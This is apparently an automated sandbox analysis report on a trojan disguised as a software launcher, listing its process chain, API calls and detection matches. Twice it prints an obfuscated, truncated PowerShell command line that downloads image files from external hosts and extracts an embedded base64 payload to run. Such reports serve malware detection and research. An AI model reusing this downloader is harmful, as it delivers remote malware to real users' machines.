Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C			Jump to behavior

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD62C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,		0_2_00007FF66FD62C54
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD61C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,		0_2_00007FF66FD61C0C

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD61D28	0_2_00007FF66FD61D28
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD666C4	0_2_00007FF66FD666C4
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD640C4	0_2_00007FF66FD640C4
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD66CA4	0_2_00007FF66FD66CA4
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD62DB4	0_2_00007FF66FD62DB4
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD65D90	0_2_00007FF66FD65D90
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD63530	0_2_00007FF66FD63530
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD61C0C	0_2_00007FF66FD61C0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0040B150	14_2_0040B150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004532D0	14_2_004532D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0044F30D	14_2_0044F30D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043933F	14_2_0043933F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0040D5C7	14_2_0040D5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004475D0	14_2_004475D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004526E0	14_2_004526E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00453970	14_2_00453970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00447A40	14_2_00447A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00428C60	14_2_00428C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00453CD0	14_2_00453CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00439D09	14_2_00439D09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00415D9A	14_2_00415D9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00410F50	14_2_00410F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00430F00	14_2_00430F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00424040	14_2_00424040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043A00A	14_2_0043A00A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00450030	14_2_00450030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004150C7	14_2_004150C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004230F9	14_2_004230F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043908C	14_2_0043908C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004330AA	14_2_004330AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043F140	14_2_0043F140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041B170	14_2_0041B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00443128	14_2_00443128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043E13D	14_2_0043E13D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00408190	14_2_00408190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004342FC	14_2_004342FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00402280	14_2_00402280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00450330	14_2_00450330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004263F0	14_2_004263F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004373F0	14_2_004373F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043C403	14_2_0043C403
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00449410	14_2_00449410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004074A0	14_2_004074A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043F4A0	14_2_0043F4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043B570	14_2_0043B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004165C3	14_2_004165C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004295B0	14_2_004295B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00403620	14_2_00403620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0040C630	14_2_0040C630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00443686	14_2_00443686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043D694	14_2_0043D694
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_004466AF	14_2_004466AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0042574D	14_2_0042574D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00408770	14_2_00408770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0040B770	14_2_0040B770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041E773	14_2_0041E773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00450720	14_2_00450720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041472A	14_2_0041472A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0044C780	14_2_0044C780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0043E78F	14_2_0043E78F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041B7A3	14_2_0041B7A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00441840	14_2_00441840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041D877	14_2_0041D877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0042F836	14_2_0042F836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041D83B	14_2_0041D83B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00422996	14_2_00422996
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00426A50	14_2_00426A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00445A28	14_2_00445A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00409AD0	14_2_00409AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00441AF0	14_2_00441AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041CAF4	14_2_0041CAF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00416B0C	14_2_00416B0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00436B30	14_2_00436B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0040BBC0	14_2_0040BBC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00448B80	14_2_00448B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0042FB9F	14_2_0042FB9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00452BA0	14_2_00452BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0040FBB0	14_2_0040FBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00429C10	14_2_00429C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041ECF1	14_2_0041ECF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00408CF0	14_2_00408CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00446CF0	14_2_00446CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00402C80	14_2_00402C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00450C80	14_2_00450C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00450D70	14_2_00450D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00423D05	14_2_00423D05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0040AD10	14_2_0040AD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00451D30	14_2_00451D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00413E40	14_2_00413E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0044CE10	14_2_0044CE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0040EE30	14_2_0040EE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00437EE1	14_2_00437EE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00452EE0	14_2_00452EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00412EEA	14_2_00412EEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00446F50	14_2_00446F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0042BF5F	14_2_0042BF5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0040BF00	14_2_0040BF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00403F02	14_2_00403F02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00445F1C	14_2_00445F1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00424F97	14_2_00424F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00416FA0	14_2_00416FA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0040AB10 appears 75 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0041A0E0 appears 112 times

Source: IMSoftware{Launcher}3.21.exe

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 4952 bytes, 1 file, at 0x2c +A "67f525209658e.vbs", ID 1163, number 1, 1 datablock, 0x1503 compression

Source: IMSoftware{Launcher}3.21.exe	Binary or memory string: OriginalFilename vs IMSoftware{Launcher}3.21.exe
Source: IMSoftware{Launcher}3.21.exe, 00000000.00000002.1179754644.00007FF66FD6E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs IMSoftware{Launcher}3.21.exe
Source: IMSoftware{Launcher}3.21.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs IMSoftware{Launcher}3.21.exe

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5444
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2043
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5444	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2043	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 6.2.powershell.exe.15eb0f20000.0.raw.unpack, SimpleZip.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.powershell.exe.15eb0f20000.0.raw.unpack, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.powershell.exe.15eb0f20000.0.raw.unpack, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@17/12@5/4

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD66CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_00007FF66FD66CA4

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD61C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,

0_2_00007FF66FD61C0C

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD666C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,

0_2_00007FF66FD666C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

